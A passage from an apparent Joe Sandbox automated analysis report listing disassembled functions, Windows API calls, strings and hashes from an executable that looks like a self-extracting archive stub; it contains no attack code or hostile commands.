                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: GETPASSWORD1
                                                                                      • API String ID: 445417207-3292211884
                                                                                      • Opcode ID: 087956dcc0f3e5f5cd4335f02cfc9395c7e8dd536ffdab82a82b355ae5e90f31
                                                                                      • Instruction ID: 100f3b192e9cfbdd8f2b2b98036ae69839b57edfbb7e790b106f506355c950cf
                                                                                      • Opcode Fuzzy Hash: 087956dcc0f3e5f5cd4335f02cfc9395c7e8dd536ffdab82a82b355ae5e90f31
                                                                                      • Instruction Fuzzy Hash: CD110833A401197BDB219E659D59FFB376CEB49740F00002AFA45F25C0C2BD9D9196B9
                                                                                      Function 0040B100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _swprintf.LIBCMT ref: 0040B127
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • _wcschr.LIBVCRUNTIME ref: 0040B145
                                                                                      • _wcschr.LIBVCRUNTIME ref: 0040B155
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                      • String ID: %c:\
                                                                                      • API String ID: 525462905-3142399695
                                                                                      • Opcode ID: ab0f35cbc93ec0c3895bcef5fc26dd1b196007fa916bd85788b52985f6bda9c2
                                                                                      • Instruction ID: 83dfc5739848c9a2cc9a31e59d8c1738e83a7b92f3f4c1f9231d81973378a19b
                                                                                      • Opcode Fuzzy Hash: ab0f35cbc93ec0c3895bcef5fc26dd1b196007fa916bd85788b52985f6bda9c2
                                                                                      • Instruction Fuzzy Hash: 7A01D62750031175C630AB769C41D6BB7ACEF557A0B90442BF884EA1C2FB38D851C2ED
                                                                                      Function 0040F930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(000001A0,00441E74,00000000,?,?,0040FB88,00000020,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?), ref: 0040F969
                                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F973
                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F983
                                                                                      Strings
                                                                                      • Thread pool initialization failed., xrefs: 0040F99B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                      • String ID: Thread pool initialization failed.
                                                                                      • API String ID: 3340455307-2182114853
                                                                                      • Opcode ID: a82eb56b1eaa3b152ec46273dee2aac128424b501c3008b8562f01dd859fc14b
                                                                                      • Instruction ID: 3b37a7d0d68a4c9a63eecc056d335734bdcae90b647a557777762d499f4852a2
                                                                                      • Opcode Fuzzy Hash: a82eb56b1eaa3b152ec46273dee2aac128424b501c3008b8562f01dd859fc14b
                                                                                      • Instruction Fuzzy Hash: B5119AB1600705AFD3305F66A899AA7FBECEF95754F10483FE2DA92240DA742840CB54
                                                                                      Function 0041BEE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                      • API String ID: 0-56093855
                                                                                      • Opcode ID: 5d5f502b135f9ba1f65ca1c5644faffe898d8437fcb85ec40f5018cc14906c71
                                                                                      • Instruction ID: 7a3690c2807c8c699c404bc87d5611777972c0596adae7d95efb857740de833d
                                                                                      • Opcode Fuzzy Hash: 5d5f502b135f9ba1f65ca1c5644faffe898d8437fcb85ec40f5018cc14906c71
                                                                                      • Instruction Fuzzy Hash: 69017176609205AFD7019B18FD40EA6BBE9E74A394F014437FA41D2230D3659C52DFAE
                                                                                      Function 0040CE48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040CE57
                                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040CE66
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindHandleModuleResource
                                                                                      • String ID: LTR$RTL
                                                                                      • API String ID: 3537982541-719208805
                                                                                      • Opcode ID: f5531f7fdbf86b5848456118a828e2f3a448ef7cba4e36e775f8be5f79b79e57
                                                                                      • Instruction ID: b3a90f969d2e1b819b8badd8afbcbbcbbf3d021c2709553dbbb571471155815d
                                                                                      • Opcode Fuzzy Hash: f5531f7fdbf86b5848456118a828e2f3a448ef7cba4e36e775f8be5f79b79e57
                                                                                      • Instruction Fuzzy Hash: 7BF0F621644314A7E6345665AC1AF6737ACE785B00F0043BEB645961C0DBA9990987E9
                                                                                      Function 00409F2A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00407F55,?,?,?), ref: 00409FD0
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00407F55,?,?), ref: 0040A014
                                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00407F55,?,?,?,?,?,?,?,?), ref: 0040A095
                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,00407F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A09C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                      • String ID:
                                                                                      • API String ID: 2287278272-0
                                                                                      • Opcode ID: 09143fdbaabf4abb9215d8cf038442808fc2e431ca9a32863b896d2d661c1e2a
                                                                                      • Instruction ID: be39ff34c6672a3e1122f0c0cd9ce7929570613bf26094579ca1c930b93c29d7
                                                                                      • Opcode Fuzzy Hash: 09143fdbaabf4abb9215d8cf038442808fc2e431ca9a32863b896d2d661c1e2a
                                                                                      • Instruction Fuzzy Hash: 9841D0312483859AD731DF24DC45FABBBE8AB85704F04092EB5D4E32C1D6789A0C875B
                                                                                      Function 004293F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00422794,00000000,00000000,00422FC2,?,00422FC2,?,00000001,00422794,F5E85006,00000001,00422FC2,00422FC2), ref: 00429440
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004294C9
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004294DB
                                                                                      • __freea.LIBCMT ref: 004294E4
                                                                                        • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 2486c37c843befccd92cc6c04341fafaeb1d5c4fe3b75795d77b5d5c47f578ee
                                                                                      • Instruction ID: 55cb407fbba19a32dacdc7774063185a3600d30289ff6605764e9969f687a012
                                                                                      • Opcode Fuzzy Hash: 2486c37c843befccd92cc6c04341fafaeb1d5c4fe3b75795d77b5d5c47f578ee
                                                                                      • Instruction Fuzzy Hash: B731F072A0022AABDF25AF65EC41DAF7BA5EF00310F44422AFC04D7250E739CD52CB94
                                                                                      Function 00419A76 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadBitmapW.USER32(00000065), ref: 00419A86
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00419AA7
                                                                                      • DeleteObject.GDI32(00000000), ref: 00419ACF
                                                                                      • DeleteObject.GDI32(00000000), ref: 00419AEE
                                                                                        • Part of subcall function 00418BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00419AC8,00000066), ref: 00418BE1
                                                                                        • Part of subcall function 00418BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00419AC8,00000066), ref: 00418BF9
                                                                                        • Part of subcall function 00418BD0: LoadResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C0C
                                                                                        • Part of subcall function 00418BD0: LockResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 142272564-0
                                                                                      • Opcode ID: aae964c5a5e832d2a491ffb6267801f5ea6ff549f9e4239260615fc5deb102ec
                                                                                      • Instruction ID: 9b58e65e1d2ced7c129d24bb43d728f6f417577d3bcdd415e0e76cf14d4ae957
                                                                                      • Opcode Fuzzy Hash: aae964c5a5e832d2a491ffb6267801f5ea6ff549f9e4239260615fc5deb102ec
                                                                                      • Instruction Fuzzy Hash: E301473368020437C21077359C42EFFB2AEDF85BA5F08002AF900E7251DE598C5582A9
                                                                                      Function 00421009 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00421020
                                                                                        • Part of subcall function 00421658: ___AdjustPointer.LIBCMT ref: 004216A2
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00421037
                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00421049
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0042106D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 2633735394-0
                                                                                      • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction ID: 80f4c66d099d73dfdd289a2da929afb3482be3845ac9810e61bdd392d2d44168
                                                                                      • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction Fuzzy Hash: 21012D32100159FBCF125F56DC41EDA7BB9EF58754F45401AFD1865121C339E8A1DB94
                                                                                      Function 00420B66 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00420B66
                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00420B6B
                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00420B70
                                                                                        • Part of subcall function 00421C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00421C1F
                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00420B85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                      • String ID:
                                                                                      • API String ID: 1761009282-0
                                                                                      • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction ID: ef1f28de980ea73d1d059b065ea788e490f593ce141cf60a47778f23d19d9c54
                                                                                      • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction Fuzzy Hash: D2C04CA93542B0541C343AF336021AE07C00C767DE7D111CFA891172375A0E540A603F
                                                                                      Function 00418CF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00418BA5: GetDC.USER32(00000000), ref: 00418BA9
                                                                                        • Part of subcall function 00418BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00418BB4
                                                                                        • Part of subcall function 00418BA5: ReleaseDC.USER32(00000000,00000000), ref: 00418BBF
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00418D24
                                                                                        • Part of subcall function 00418EEA: GetDC.USER32(00000000), ref: 00418EF3
                                                                                        • Part of subcall function 00418EEA: GetObjectW.GDI32(?,00000018,?), ref: 00418F22
                                                                                        • Part of subcall function 00418EEA: ReleaseDC.USER32(00000000,?), ref: 00418FB6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                      • String ID: (
                                                                                      • API String ID: 1061551593-3887548279
                                                                                      • Opcode ID: 64171df757ed768744e2e22994194725f5a0cd9a101f525b84aab6c9ae049917
                                                                                      • Instruction ID: 4bd2fa2783d531d3fb11dd477b2d0390eafbba661acf2b3b907c2a716d6d4396
                                                                                      • Opcode Fuzzy Hash: 64171df757ed768744e2e22994194725f5a0cd9a101f525b84aab6c9ae049917
                                                                                      • Instruction Fuzzy Hash: 0D6114B1204305AFD210DF64C888EABBBE9FF89704F10495EF599C7260CB35E846CB66
                                                                                      Function 004101DF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _swprintf
                                                                                      • String ID: %ls$%s: %s
                                                                                      • API String ID: 589789837-2259941744
                                                                                      • Opcode ID: d11954739eea34fad46824556b4284334c8bdd64b4a532404cdbe83fc6355c6e
                                                                                      • Instruction ID: bdac8a5c8cc74f88d730a68ebf3e8f625cc28345b767a64e3f9eff6180920be0
                                                                                      • Opcode Fuzzy Hash: d11954739eea34fad46824556b4284334c8bdd64b4a532404cdbe83fc6355c6e
                                                                                      • Instruction Fuzzy Hash: CC51E43128C300FAEA211A948C4AFE53655AB05F00F60855BF78A684E6C5FE9CD6661F
                                                                                      Function 00407619 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040761E
                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00407799
                                                                                        • Part of subcall function 0040A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A0D7
                                                                                        • Part of subcall function 0040A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A108
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$H_prologTime
                                                                                      • String ID: :
                                                                                      • API String ID: 1861295151-336475711
                                                                                      • Opcode ID: 58a6356984b005caafd33ed77775c5f43441efb3fd6cc2288d6cb7772f80a03d
                                                                                      • Instruction ID: 9010d32154f792f1e88284cdbfe6923ec057783e04b3e2b12577616e13bcdb97
                                                                                      • Opcode Fuzzy Hash: 58a6356984b005caafd33ed77775c5f43441efb3fd6cc2288d6cb7772f80a03d
                                                                                      • Instruction Fuzzy Hash: 5A418B71808218AADB24EB61DC45EEE777CAF44344F0040BFB545B71C2DB786E89CB6A
                                                                                      Function 0040B275 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: UNC$\\?\
                                                                                      • API String ID: 0-253988292
                                                                                      • Opcode ID: 59418b8d02dc80c9185aefb35123d512a5759d39c114300e375357c0869d6347
                                                                                      • Instruction ID: 1cb071ac49dc019430a20a9a31e14aa50c7fe294fdd32942590b0da6c684df21
                                                                                      • Opcode Fuzzy Hash: 59418b8d02dc80c9185aefb35123d512a5759d39c114300e375357c0869d6347
                                                                                      • Instruction Fuzzy Hash: 78415C3140021AB6CB21AF229C41BEF7769EF05354F20457BF854B62C2E778DA95DAAC
                                                                                      Function 0041802D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Shell.Explorer$about:blank
                                                                                      • API String ID: 0-874089819
                                                                                      • Opcode ID: 82103f05ed6fce802906265e1e193abb2f9ddcf6bbfbd39e06f5d39419f9593e
                                                                                      • Instruction ID: bd1a186621fddd946f4565b797d85f2c3baaa4171c5ed536e942b9a34f218066
                                                                                      • Opcode Fuzzy Hash: 82103f05ed6fce802906265e1e193abb2f9ddcf6bbfbd39e06f5d39419f9593e
                                                                                      • Instruction Fuzzy Hash: AC21957530060AAFD704AF61C890EA7BB68BF89714B15851FF50587681CF79EC84CB99
                                                                                      Function 0040DF34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040DED4
                                                                                        • Part of subcall function 0040DEB5: GetProcAddress.KERNEL32(00441E58,CryptUnprotectMemory), ref: 0040DEE4
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,0040DF2E), ref: 0040DFB5
                                                                                      Strings
